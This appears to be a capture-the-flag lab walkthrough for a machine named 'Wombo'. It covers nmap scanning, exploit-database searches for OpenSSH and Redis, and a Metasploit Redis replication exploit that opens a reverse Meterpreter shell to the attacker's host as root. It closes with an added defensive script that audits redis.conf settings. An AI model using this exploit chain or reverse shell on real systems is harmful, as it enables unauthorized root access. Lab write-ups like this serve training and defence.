# Wombo

## Intro

```
# Nmap 7.94SVN scan initiated Fri Mar 29 09:30:46 2024 as: nmap -sC -sV -vv -oA nmap/initial wombo.pg
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.1 \d\d\d (?:[^\r\n]*\r\n(?!\r\n))*?.*\r\nServer: Virata-EmWeb/R([\d_]+)\r\nContent-Type: text/html; ?charset=UTF-8\r\nExpires: .*<title>HP (Color |)LaserJet ([\w._ -]+)&nbsp;&nbsp;&nbsp;'
Nmap scan report for wombo.pg (192.168.172.69)
Host is up, received echo-reply ttl 61 (0.042s latency).
Scanned at 2024-03-29 09:30:47 CDT for 24s
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE  SERVICE    REASON         VERSION
22/tcp   open   ssh        syn-ack ttl 61 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 09:80:39:ef:3f:61:a8:d9:e6:fb:04:94:23:c9:ef:a8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGBXRhQCez7/IOdnHzLYdpVtWWRMN/7bUR/C3T/W6V9DwlKUS2AfdncLdLwqnx61jODFdXDrTdEdTAtK4MHuXt/UOLDXr1SOfUHYQbZd1rmpMaeB3qOKfoVP7NMp2Ga68kT/9NvBphakYXRWw4C7RS0N+4YWU/BjSyMTIdnhJX05lC5Uyljg7FliJ7d3J/CtF98I6Oo5u/Eb2/5BB45/1IuM6R7BGCDOpIs6po1FyEk8gFktbB+INGATdBPxvmAOX6G7m/R491a9/QtaF8wrgsjS3fQftoiW8vwcaom8Bmu94xZ9pZq0Dgt9VWQz241T5dGQrp57s6Djl/V83/qGFP
|   256 83:f8:6f:50:7a:62:05:aa:15:44:10:f5:4a:c2:f5:a6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLg0oQ1t4NCz+KWPtrCjgDf+qjW2Vb4oOc/eM21vT9rIPJa//rO0LFT8czDxcWFU9HMSEohfSm8emC4lShgGrY4=
|   256 1e:2b:13:30:5c:f1:31:15:b4:e8:f3:d2:c4:e8:05:b5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPS81xs7EU6k92rNFdmsDF7qcRDxDILJUeva18aKW1GV
53/tcp   closed domain     reset ttl 61
80/tcp   open   http       syn-ack ttl 61 nginx 1.10.3
|_http-title: Welcome to nginx!
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3
8080/tcp open   http-proxy syn-ack ttl 61
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home | NodeBB
|_http-favicon: Unknown favicon MD5: 152FF7D5AE5BDB84B33D4DCA31EB7CD3
| http-robots.txt: 3 disallowed entries 
|_/admin/ /reset/ /compose
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     X-DNS-Prefetch-Control: off
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Referrer-Policy: strict-origin-when-cross-origin
|     X-Powered-By: NodeBB
|     set-cookie: _csrf=FrVAVZmax3Bh4eITxK1YpdTU; Path=/
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 11098
|     ETag: W/"2b5a-d4cpxIx7F4gKsmtHDO3klQzqrG0"
|     Vary: Accept-Encoding
|     Date: Fri, 29 Mar 2024 14:30:59 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en-GB" data-dir="ltr" style="direction: ltr;" >
|     <head>
|     <title>Not Found | NodeBB</title>
|     <meta name="viewport" content="width&#x3D;device-width, initial-scale&#x3D;1.0" />
|     <meta name="content-type" content="text/html; charset=UTF-8" />
|     <meta name="apple-mobile-web-app-capable" content="yes" />
|     <meta name="mobile-web-app-capable" content="yes" />
|     <meta property="og:site_n
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-DNS-Prefetch-Control: off
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Referrer-Policy: strict-origin-when-cross-origin
|     X-Powered-By: NodeBB
|     set-cookie: _csrf=e_Gw9hiHeqzrq47l7lnpZMxh; Path=/
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 18181
|     ETag: W/"4705-Whn/BeeEWdcGXAmiDfsThfeSkvw"
|     Vary: Accept-Encoding
|     Date: Fri, 29 Mar 2024 14:30:58 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en-GB" data-dir="ltr" style="direction: ltr;" >
|     <head>
|     <title>Home | NodeBB</title>
|     <meta name="viewport" content="width&#x3D;device-width, initial-scale&#x3D;1.0" />
|     <meta name="content-type" content="text/html; charset=UTF-8" />
|     <meta name="apple-mobile-web-app-capable" content="yes" />
|     <meta name="mobile-web-app-capable" content="yes" />
|     <meta property="og:site_name" content
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-DNS-Prefetch-Control: off
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Referrer-Policy: strict-origin-when-cross-origin
|     X-Powered-By: NodeBB
|     Allow: GET,HEAD
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 8
|     ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
|     Vary: Accept-Encoding
|     Date: Fri, 29 Mar 2024 14:30:58 GMT
|     Connection: close
|     GET,HEAD
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 09:31:11 2024 -- 1 IP address (1 host up) scanned in 24.15 seconds

```

Open Ports

* 22/tcp - OpenSSH 7.4p1 Debian
* 80/tcp - nginx 1.10.3
* 6379/tcp - Redis key-value store 5.0.9
* 8080/tcp - HTTP, not fingerprinted by Nmap (NodeBB per the `X-Powered-By` header)
* 27017/tcp - MongoDB?

OpenSSH exploits

```
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Debian OpenSSH - (Authenticated) Remote SELinux Privilege Escalation                                            | linux/remote/6094.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                            | linux/remote/45939.py

```

Additional Nmap results

```
6379/tcp  open   redis      syn-ack ttl 61 Redis key-value store 5.0.9                                                                            
8080/tcp  open   http-proxy syn-ack ttl 61                                                                                                        
27017/tcp open   mongod?    syn-ack ttl 61                             
```

Redis exploits

```
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Redis - Replication Code Execution (Metasploit)                                                                 | linux/remote/48272.rb
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)                                                   | linux/remote/47195.rb
Redis 5.0 - Denial of Service                                                                                   | linux/dos/44908.txt
Redis-cli < 5.0 - Buffer Overflow (PoC)                                                                         | linux/local/44904.py
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

```

## Initial Foothold

```
msf6 exploit(linux/redis/redis_replication_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.45.197:80 
[*] 192.168.172.69:6379   - Compile redis module extension file
[+] 192.168.172.69:6379   - Payload generated successfully! 
[*] 192.168.172.69:6379   - Listening on 192.168.45.197:6379
[*] 192.168.172.69:6379   - Rogue server close...
[*] 192.168.172.69:6379   - Sending command to trigger payload.
[*] Sending stage (3045380 bytes) to 192.168.172.69
[*] Meterpreter session 1 opened (192.168.45.197:80 -> 192.168.172.69:41234) at 2024-03-29 10:10:52 -0500
[!] 192.168.172.69:6379   - This exploit may require manual cleanup of './hcwoot.so' on the target

meterpreter > getuid
Server username: root
meterpreter > shell
Process 1121 created.
Channel 1 created.
whoami
root
cat /root/proof.txt
bdca7f701911d77776b59652397c383b
```
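
A defender-side check for the exposure this foothold is consistent with (Redis reachable over the network without authentication, with module loading and replication commands available), as an added example that is not part of the original walkthrough. The target's actual `redis.conf` is not shown on the page, so both sample configs are constructed, and disabling `SLAVEOF`/`REPLICAOF` assumes the instance does not use replication.

```python
"""Audit a redis.conf for settings that leave Redis open to module-load abuse."""

LOOPBACK = {"127.0.0.1", "::1"}
RISKY_COMMANDS = ("MODULE", "SLAVEOF", "REPLICAOF", "CONFIG")

# Both configs are constructed for this example; the target's file is not on the page.
EXPOSED_CONF = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED_CONF = (
    "bind 127.0.0.1\nprotected-mode yes\n"
    "requirepass <placeholder-long-random-secret>\n"
    'rename-command MODULE ""\nrename-command SLAVEOF ""\n'
    'rename-command REPLICAOF ""\nrename-command CONFIG ""\n'
)

def parse_conf(text):
    """Return (settings, renamed): directive -> args, and COMMAND -> new name."""
    settings, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, *args = line.split()
        if key.lower() == "rename-command" and len(args) == 2:
            # An empty new name ("") disables the command entirely.
            renamed[args[0].upper()] = args[1].strip('"')
        else:
            settings[key.lower()] = args
    return settings, renamed

def audit(text):
    """Return a list of findings; an empty list means no issue was flagged."""
    settings, renamed = parse_conf(text)
    findings = []
    bind = settings.get("bind", [])
    pm_off = settings.get("protected-mode", ["yes"])[0].lower() == "no"
    # Protected mode only guards instances with no explicit bind and no password.
    exposed = any(a not in LOOPBACK for a in bind) or (not bind and pm_off)
    if exposed and "requirepass" not in settings:
        findings.append("network-reachable without requirepass")
    if pm_off:
        findings.append("protected-mode disabled")
    for cmd in RISKY_COMMANDS:
        if cmd not in renamed:
            findings.append(f"{cmd} not renamed or disabled")
    return findings

if __name__ == "__main__":
    for name, conf in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf) or "no findings")
```

The session above also came back as `root`, which a config file audit does not cover: check separately that the Redis service runs under a dedicated unprivileged account.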

## Privilege Escalation

No escalation required: the Meterpreter session from the Redis exploit already runs as root.


